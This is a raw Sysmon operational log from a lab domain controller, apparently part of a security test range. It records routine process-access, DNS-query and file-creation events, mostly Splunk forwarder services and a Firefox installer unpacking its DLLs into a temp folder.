13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.130{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.882{59A5CD1D-944E-6005-2205-00000000A301}6120download-installer.cdn.mozilla.net0type: 5 dn6m9t4qll5h.cloudfront.net;::ffff:13.224.189.56;C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 22542200x800000000000000013924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.500{59A5CD1D-944E-6005-2205-00000000A301}6120download.mozilla.org0type: 5 bouncer-bouncer-elb.prod.mozaws.net;::ffff:18.205.79.132;::ffff:100.24.193.114;::ffff:3.94.27.216;C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 22542200x800000000000000013923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.858{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 11241100x800000000000000014020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:59:46.536{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\xul.dll2021-01-18 13:59:46.536 11241100x800000000000000014019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.521{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\vcruntime140.dll2021-01-18 13:59:46.521 11241100x800000000000000014018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.490{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\ucrtbase.dll2021-01-18 13:59:46.490 11241100x800000000000000014017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.490{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\softokn3.dll2021-01-18 13:59:46.490 11241100x800000000000000014016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.490{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\qipcap64.dll2021-01-18 13:59:46.490 11241100x800000000000000014015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.474{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\osclientcerts.dll2021-01-18 13:59:46.474 11241100x800000000000000014014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:59:46.474{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\nssckbi.dll2021-01-18 13:59:46.474 11241100x800000000000000014013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.396{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\nss3.dll2021-01-18 13:59:46.396 11241100x800000000000000014012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.380{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\msvcp140.dll2021-01-18 13:59:46.380 11241100x800000000000000014011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.365{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\mozglue.dll2021-01-18 13:59:46.365 11241100x800000000000000014010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.349{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\mozavutil.dll2021-01-18 13:59:46.349 11241100x800000000000000014009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.302{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\mozavcodec.dll2021-01-18 13:59:46.302 11241100x800000000000000014008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\libGLESv2.dll2021-01-18 13:59:46.208 11241100x800000000000000014007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\libEGL.dll2021-01-18 13:59:46.208 11241100x800000000000000014006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\lgpllibs.dll2021-01-18 13:59:46.208 11241100x800000000000000014005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\IA2Marshal.dll2021-01-18 13:59:46.208 11241100x800000000000000014004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.193{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\freebl3.dll2021-01-18 13:59:46.193 10341000x800000000000000014003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000014002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000013995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.068{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\d3dcompiler_47.dll2021-01-18 13:59:46.068 11241100x800000000000000013994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.068{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\gmp-clearkey\0.1\clearkey.dll2021-01-18 13:59:46.068 11241100x800000000000000013993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-utility-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-time-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-string-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-stdio-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-runtime-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-process-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-private-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-multibyte-l1-1-0.dll2021-01-18 13:59:46.052 
11241100x800000000000000013985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-math-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-locale-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-heap-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-filesystem-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-environment-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-convert-l1-1-0.dll2021-01-18 
13:59:46.052 11241100x800000000000000013979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-conio-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-timezone-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-synch-l1-2-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 